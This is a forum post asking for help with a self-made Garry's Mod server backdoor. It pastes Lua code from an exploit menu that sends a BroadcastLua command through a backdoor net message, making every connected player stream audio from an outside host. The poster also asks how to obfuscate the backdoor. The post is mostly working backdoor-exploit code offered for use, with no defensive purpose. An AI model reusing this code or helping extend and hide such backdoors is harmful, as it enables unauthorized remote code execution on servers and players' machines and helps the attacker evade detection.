Hello, i made my own backdoor and i want to play music in the server when i type "music 1" "music 2" ... In th console.
I found this in the smenu :
Code:
local Macro = vgui.Create( "DButton" )
Macro:SetParent(Musiques)
Macro:SetPos( 20, 30 )
Macro:SetTextColor( Color(255, 255, 255, 255) )
Macro:SetSize( 110, 25 )
Macro:SetText( "Musique - Be Friend" )
Macro.Paint = function()
surface.SetDrawColor(29, 39, 55)
surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
surface.SetDrawColor( 32, 80, 154 )
surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
end
Macro.DoClick = function()
net.Start(netKey)
net.WriteString("BroadcastLua([[sound.PlayURL( \"https://loadingscrren.000webhostapp.com/BE%20FRIENDS.mp3\", \"mono\", function()end )]])")
net.WriteBit (1)
net.SendToServer()
chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Smenu.exe", "] ", Color( 255, 255, 255 ), "Musique - Be Friend activ�" )
SploitNotify("Musique - Be Friend ")
surface.PlaySound("buttons/blip1.wav")
end
etc
How do i add music in my backdoor ?
PS : I'm looking for a method to obfuscate.
Thanks !